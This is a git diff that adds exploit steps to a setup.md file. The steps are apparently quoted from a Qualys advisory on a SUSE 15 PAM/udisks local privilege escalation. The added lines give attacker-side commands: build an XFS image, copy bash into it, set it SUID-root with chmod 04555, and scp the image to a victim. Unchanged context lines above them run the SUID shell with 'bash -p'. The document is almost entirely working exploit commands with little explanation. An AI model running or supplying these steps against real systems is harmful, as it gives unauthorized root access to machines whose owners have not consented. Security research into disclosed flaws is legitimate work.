diff --git a/setup.md b/setup.md
index 39eb46f..9132bf4 100644
--- a/setup.md
+++ b/setup.md
@@ -25,4 +25,29 @@ find /tmp | grep blockdev
 mount
 
 /tmp/blockdev*/bash -p
+```
+
+
+From: https://cdn2.qualys.com/2025/06/17/suse15-pam-udisks-lpe.txt
+
+```bash
+1/ On our own attacker machine, as root, we create an XFS image that
+contains a SUID-root shell, and copy it to the victim machine:
+
+------------------------------------------------------------------------
+attacker# dd if=/dev/zero of=./xfs.image bs=1M count=300
+
+attacker# mkfs.xfs ./xfs.image
+
+attacker# mkdir ./xfs.mount
+
+attacker# mount -t xfs ./xfs.image ./xfs.mount
+
+attacker# cp /bin/bash ./xfs.mount
+
+attacker# chmod 04555 ./xfs.mount/bash
+
+attacker# umount ./xfs.mount
+
+attacker# scp -i id_ed25519 ./xfs.image nobody@victim:
 ```
\ No newline at end of file